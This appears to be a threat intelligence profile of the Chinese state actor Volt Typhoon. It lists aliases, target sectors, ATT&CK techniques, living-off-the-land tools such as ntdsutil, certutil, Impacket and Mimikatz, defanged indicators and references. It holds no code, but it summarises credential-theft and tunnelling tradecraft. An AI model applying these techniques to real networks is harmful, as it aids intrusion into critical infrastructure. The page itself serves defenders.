Volt Typhoon

Also known as: VANGUARD PANDA, Bronze Silhouette, DEV-0391, Insidious Taurus, UNC3236, Redfly, Storm-0391, VOLTZITE

ActiveNation-StateChinaMITRE G1017

0Campaigns

32Techniques

4IOCs

17Tools

0Matches

3Infrastructure

Overview

Volt Typhoon is a Chinese state-sponsored threat actor focused on pre-positioning for potential disruptive or destructive operations against U.S. critical infrastructure. First publicly disclosed by Microsoft in May 2023, the group has been active since at least mid-2021 and represents a significant shift in Chinese cyber operations from traditional espionage to operational preparation of the environment (OPE). The group is characterized by its exclusive use of living-off-the-land (LOTL) techniques, avoiding custom malware in favor of built-in Windows tools, legitimate network administration utilities, and compromised SOHO routers as operational relay boxes (ORBs). This approach makes detection exceptionally difficult as the activity blends with normal administrative operations. Volt Typhoon has compromised organizations across communications, energy, transportation, and water/wastewater sectors. U.S. intelligence agencies assess that the group's operations are designed to maintain persistent access to critical infrastructure networks that could be leveraged for disruptive attacks during a potential Taiwan Strait crisis.

Motivations

Pre-positioningCritical Infrastructure AccessStrategic Deterrence

Target Sectors

Critical InfrastructureCommunicationsEnergyWater/WastewaterTransportationGovernmentDefense Industrial BaseMaritimeOil and GasManufacturingConstructionEducationInformation TechnologyTelecommunicationsAviation

Activity Timeline

First Seen

Jan 2021

Last Seen

Jan 2024

Quick Facts

OriginChina

Sophisticationnation-state

StatusActive

MITRE GroupG1017

MITRE ATT&CK Techniques

(32)

Initial Access

T1190

Exploit Public-Facing Application

Exploit vulnerabilities in internet-facing applications to gain access.

T1133

External Remote Services

Abuse remote services like VPNs or RDP to gain access to the network.

T1078

Valid Accounts

Use legitimate credentials to authenticate and gain access.

Execution

T1059.001

PowerShell

Use PowerShell commands and scripts for execution and automation.

T1059.003

Windows Command Shell

Use cmd.exe to execute commands and batch scripts.

Other

Credential Access

T1003.001

LSASS Memory

Access LSASS process memory to extract credential material.

Discovery

T1046

Network Service Discovery

Scan for services running on remote hosts across the network.

T1018

Remote System Discovery

Discover remote systems on the network for lateral movement targets.

Command and Control

T1105

Ingress Tool Transfer

Download additional tools or payloads from an external system.

Lateral Movement

T1021.001

Remote Desktop Protocol

Use RDP to connect to and control remote systems.

Tools & Malware

(17)

PowerShell

os utilityLegitimate

Primary tool for reconnaissance and command execution. Used with encoded commands to query AD, enumerate network shares, and gather system information without deploying malware.

ntdsutil

os utilityLegitimate

Windows utility abused to create snapshots of the Active Directory database (NTDS.dit) for offline credential extraction and domain-wide access.

netsh

os utilityLegitimate

Used to configure port proxying and firewall rules on compromised systems, enabling traffic forwarding through operational relay networks.

wmic

os utilityLegitimate

Windows Management Instrumentation CLI used for remote process execution, system enumeration, and lateral movement without deploying additional tools.

certutil

os utilityLegitimate

Abused for file transfers (downloading tools from C2), Base64 encoding/decoding, and certificate manipulation on compromised systems.

ldifde

os utilityLegitimate

Active Directory utility used to export directory data for offline analysis, mapping organizational structure and identifying high-value targets.

FRP (Fast Reverse Proxy)

legitimate toolLegitimate

Open-source reverse proxy tool used to create encrypted tunnels from compromised networks to external C2 infrastructure, often with modified binaries.

Impacket

frameworkLegitimate

Python toolkit used for wmiexec remote execution, secretsdump credential extraction, and SMB relay attacks during lateral movement phases.

Mimikatz

frameworkLegitimate

Deployed sparingly for credential extraction. Volt Typhoon prefers NTDS.dit offline extraction to avoid triggering LSASS memory access alerts.

Earthworm

legitimate toolLegitimate

SOCKS5 proxy tool used to create multi-hop tunnels through compromised systems, enabling access to isolated network segments.

cmd.exe

os utilityLegitimate

Command interpreter used to chain living-off-the-land binaries, execute batch scripts for reconnaissance, and manage compromised SOHO router access.

SOHO Router Exploitation

exploit kitMalicious

Compromises Fortinet FortiGuard, ASUS, Cisco, D-Link, Netgear, and Zyxel routers to create operational relay box (ORB) networks that proxy C2 traffic.

Nmap

legitimate toolLegitimate

Network scanning tool used for initial reconnaissance of target infrastructure, port scanning, and service enumeration of critical infrastructure networks.

Advanced IP Scanner

legitimate toolLegitimate

GUI-based network scanner used to map internal network topology, identify live hosts, and discover shared resources on compromised networks.

PsExec

legitimate toolLegitimate

Sysinternals utility used for remote command execution on Windows systems. Enables lateral movement using harvested credentials.

reg.exe

os utilityLegitimate

Registry command-line tool used to query and modify registry keys for persistence, disabling security features, and extracting cached credentials.

Fast Reverse Proxy (FRP)

OtherLegitimate

Legitimate reverse proxy tool abused for command and control

Indicators of Compromise

(4)

IOC values are defanged for safety

Type	Value	Notes
ip	`104[.]161[.]54[.]203`	Compromised SOHO router used as relay infrastructure
ip	`185[.]106[.]92[.]12`	Operational relay box (ORB) infrastructure
domain	`gosloede[.]com`	C2 domain identified in critical infrastructure targeting
hash	`baeffeb5fdef2f42a752c65c2d2a52e84fb57efc906d981f89dd518c314e231c`	Modified FRP binary used for tunneling (SHA-256)

Infrastructure

(3)

Domain values are defanged for safety

Domain / Host	Type	Status	Last Checked
`104[.]161[.]54[.]203` Compromised SOHO router used as relay infrastructure	ip	offline	Apr 2, 2026
`185[.]106[.]92[.]12` Operational relay box (ORB) infrastructure	ip	offline	Apr 2, 2026
`gosloede[.]com` C2 domain identified in critical infrastructure targeting	c2	offline	Apr 2, 2026

Infrastructure data reflects monitoring status only — no raw fingerprint data is exposed.

References

(10)

Microsoft - Volt Typhoon targets US critical infrastructure

https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

CISA - PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure

https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a

CrowdStrike - VANGUARD PANDA

https://www.crowdstrike.com/blog/falcon-complete-thwarts-vanguard-panda-tradecraft/

Dragos 2026 OT/ICS Cybersecurity Year in Review - VOLTZITE Elevated to Stage 2

https://www.dragos.com/resources/press-release/dragos-2026-year-in-review-new-ot-threats-ransomware

Volt Typhoon Maintained Access to Massachusetts Utility for 10 Months - The Record

https://therecord.media/volt-typhoon-hackers-utility-months

Microsoft Threat Intelligence - Volt Typhoon Targets US Critical Infrastructure

https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques

Dragos: Researchers Warn Volt Typhoon Still Embedded in US Utilities - The Record

https://therecord.media/researchers-warn-volt-typhoon-still-active-critical-infrastructure

CISA Cybersecurity Advisory - PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

NSA/FBI Joint Cybersecurity Advisory - People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection

https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

Secureworks - Bronze Silhouette Targets US Critical Infrastructure

https://www.secureworks.com/research/bronze-silhouette-targets-us-critical-infrastructure